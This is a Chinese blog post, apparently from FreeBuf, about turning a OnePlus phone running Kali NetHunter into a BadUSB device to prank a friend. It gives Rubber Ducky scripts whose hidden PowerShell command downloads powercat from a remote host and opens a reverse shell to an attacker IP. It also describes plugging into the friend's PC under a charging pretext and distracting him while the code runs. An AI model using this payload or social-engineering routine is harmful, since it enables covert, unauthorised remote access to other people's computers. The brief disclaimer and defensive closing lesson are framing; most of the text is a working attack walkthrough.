一. 起源
前几天刚换了一个手机,正好把旧手机的一加5T改装成kali nethunter,又灵机一动想对多年的好哥们进行一场恶作剧。思路:准备使用kali nethunter 的HID attack功能插上usb数据线,获取shell,对其进行锁屏。
PS:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负,与本站及作者无关。
二. 名词背景
1 近源渗透测试
它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”。
2 kali nethunter
它是一款专为渗透测试人员打造的,基于安卓的渗透测试平台。Kali Nethunter是一款用于安全研究的手机固件包,可以使Android设备增加“无线破解”、“HID攻击”、“伪造光驱”等的硬件功能以及metasploit等软件工具,目前官方只支持少量的Android手机,然而,通过重新编译Kali Nethunter源代码,可以将其编译到其他型号的手机上。
3 HID attack
它是最近几年流行的一类攻击方式。HID是Human Interface Device的缩写,意思是人机接口设备。它是对鼠标、键盘、游戏手柄这一类可以操控电脑设备的统称。由于电脑对这类设备缺少严格的检测措施,只是简单的识别设备类型,就允许设备对电脑进行各项操作。所以,通过修改篡改设备反馈信息,就可以很轻松的让电脑将其他设备误认为HID设备,从而获取控制权限。尤其是USB和蓝牙这类即插即用接口出现,导致HID Attack成为重要方式。例如,Bad USB就是USB类攻击的典型代表。Kali Linux NetHunter以手机作为硬件平台,支持常见的各种HID Attack。用户只要将手机通过USB线连接到主机上,就可以执行各种攻击,而且不会被系统拦截。之前也在博客中发表过类似的文章:
https://www.ggsec.cn/nethuner-HID.html
三. 准备工作(POC)
本次使用的工具为 kali nethunter商店的中rucky 、nethunter、与连接kali的终端
本文使用的是在F-Droid商店 安装Rucky,用于当中Badusb的功能,模拟了橡皮鸭的功能,也就是HID attack。
我们打开Rucky,对模拟代码的编辑。*根据橡皮鸭的语法:
https://www.bilibili.com/read/cv5472965
代码如下:模拟键盘win+r,延迟500ms,输入字符串cmd,因系统装有中文输入法,所以需要两次回车。
GUI r
DELAY 500
STRING cmd
ENTER
ENTER
效果如下
有了POC 后,我们需要准备获取他的shell,在获取shell的基础之上,再对他的屏幕锁屏。
下面代码为:打开win+r,按shift键切换中英文,并发送powershell代码,获取shell
GUI r
DELAY 500
SHIFT ON
DELAY 500
STRING PowerShell.exe -WindowStyle Hidden -Command "IEX (New-Object System.Net.Webclient).DownloadString('https://xxxxx/powercat.ps1');powercat -c 192.168.43.174 -p 4444 -e cmd"
ENTER
ENTER
四. 开始恶作剧
我准备对这次的恶作剧行动取名非常中二的名字为终极之蛇皮之瓜皮之恶作剧!
走到我的多年好哥们面前,以手机快没电为理由,插入他的电脑usb接口。他正在办公上网看剧。现在有一个问题摆在我面前就是HID攻击的时候,会自动在屏幕上输出代码。就是如何转移他的注意力,转移电脑屏幕 几秒。我准备以让他拿瓶水递给我,大概有几秒钟的间隙。当他去拿完水后,递给我,已经运行完了代码。接下就到了恶作剧的时间了,这个时候默默的拔出数据线,装做刷剧的样子。
rundll32.exe user32.dll,LockWorkStation
本次的恶作剧,你们学废了吗?,学废了 来医院多看看我。
五. 总结
本次给我们的教训是千万不要让让陌生人用u盘或看着像数据线的东西插入你的电脑。
除了防火防盗防好基友外,当然也要防美女,例如高跟鞋中隐藏一些工具。
来源:freebuf.com 2020-11-26 15:18:55 by: XCTF2017
请登录后发表评论
注册